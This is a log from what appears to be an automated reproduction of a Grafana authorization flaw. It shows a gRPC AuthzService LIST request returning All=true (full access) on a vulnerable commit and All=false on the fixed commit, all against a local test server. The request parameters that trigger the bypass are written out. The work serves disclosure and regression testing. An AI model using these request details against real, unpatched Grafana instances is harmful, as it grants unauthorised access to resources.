=== Grafana authz gRPC boundary reproduction ===
Root: /data/pruva/runs/a0182fdc-0c15-4d3c-b6ae-d04e7ee50d69/bundle
UTC time: 2026-07-04T19:20:40Z
Using repo path: /data/pruva/project-cache/6c6f6fd2-6e61-4267-8db1-032ee6a303f9/repo
Go version: go version go1.26.4 linux/amd64
Reusing existing git checkout at /data/pruva/project-cache/6c6f6fd2-6e61-4267-8db1-032ee6a303f9/repo
Fixed commit: b9b897b3c512ee434341bb9d698eac24f90eca89
Vulnerable commit: 27750f0e0e3443c39f992bfe22efe3d352ee4357
Patch check: vulnerable parent lacks listPermissionWithFolderAuthz fork; fixed commit contains it

=== VULNERABLE attempt 1: checkout 27750f0e0e3443c39f992bfe22efe3d352ee4357 ===
HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773)
VULNERABLE attempt 1: go test exited 0
VULNERABLE attempt 1 result: All=true
VULNERABLE attempt 1 request/response evidence:
    repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss)
    repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:39885
    repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:39885 succeeded
    repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true
    repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva
    repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=true Folders=[] Items=[] err=
    repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=true Folders=[] Items=[]

=== VULNERABLE attempt 2: checkout 27750f0e0e3443c39f992bfe22efe3d352ee4357 ===
HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773)
VULNERABLE attempt 2: go test exited 0
VULNERABLE attempt 2 result: All=true
VULNERABLE attempt 2 request/response evidence:
    repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss)
    repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:43345
    repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:43345 succeeded
    repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true
    repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva
    repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=true Folders=[] Items=[] err=
    repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=true Folders=[] Items=[]

=== FIXED attempt 1: checkout b9b897b3c512ee434341bb9d698eac24f90eca89 ===
Previous HEAD position was 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773)
HEAD is now at b9b897b3c51 IAM: folder-scoped authz with LIST (#126931)
FIXED attempt 1: go test exited 0
FIXED attempt 1 result: All=false
FIXED attempt 1 request/response evidence:
    repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss)
    repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:43707
    repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:43707 succeeded
    repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true
    repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva
    repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=false Folders=[] Items=[] err=
    repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=false Folders=[] Items=[]

=== FIXED attempt 2: checkout b9b897b3c512ee434341bb9d698eac24f90eca89 ===
HEAD is now at b9b897b3c51 IAM: folder-scoped authz with LIST (#126931)
FIXED attempt 2: go test exited 0
FIXED attempt 2 result: All=false
FIXED attempt 2 request/response evidence:
    repro_grpc_boundary_test.go:57: SETUP: mapper.Get("widget.ext.grafana.app","widgets","") found=false (false means folder-scoped CRD mapper miss)
    repro_grpc_boundary_test.go:102: SERVER: Grafana AuthzService gRPC endpoint listening on 127.0.0.1:40759
    repro_grpc_boundary_test.go:115: HEALTHCHECK: TCP connection to Grafana AuthzService endpoint 127.0.0.1:40759 succeeded
    repro_grpc_boundary_test.go:132: CLIENT: sending LIST over gRPC /authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list permission=widget.ext.grafana.app/widgets:get scope=* no_folder_permission=true
    repro_grpc_boundary_test.go:80: SERVER: accepted gRPC method=/authz.v1.AuthzService/List namespace=org-12 subject=user:test-uid group=widget.ext.grafana.app resource=widgets verb=list token_prefix=pruva
    repro_grpc_boundary_test.go:91: SERVER: completed gRPC method=/authz.v1.AuthzService/List response All=false Folders=[] Items=[] err=
    repro_grpc_boundary_test.go:135: CLIENT: received ListResponse: All=false Folders=[] Items=[]
Previous HEAD position was b9b897b3c51 IAM: folder-scoped authz with LIST (#126931)
HEAD is now at 27750f0e0e3 Variables: Remove refactorVariablesTimeRange feature flag (#126773)

=== Summary ===
Vulnerable attempt 1 (27750f0e0e3443c39f992bfe22efe3d352ee4357): All=true
Vulnerable attempt 2 (27750f0e0e3443c39f992bfe22efe3d352ee4357): All=true
Fixed attempt 1 (b9b897b3c512ee434341bb9d698eac24f90eca89): All=false
Fixed attempt 2 (b9b897b3c512ee434341bb9d698eac24f90eca89): All=false
CONFIRMED: vulnerable Grafana AuthzService gRPC LIST returns All=true across the remote API boundary, while the fixed commit returns All=false.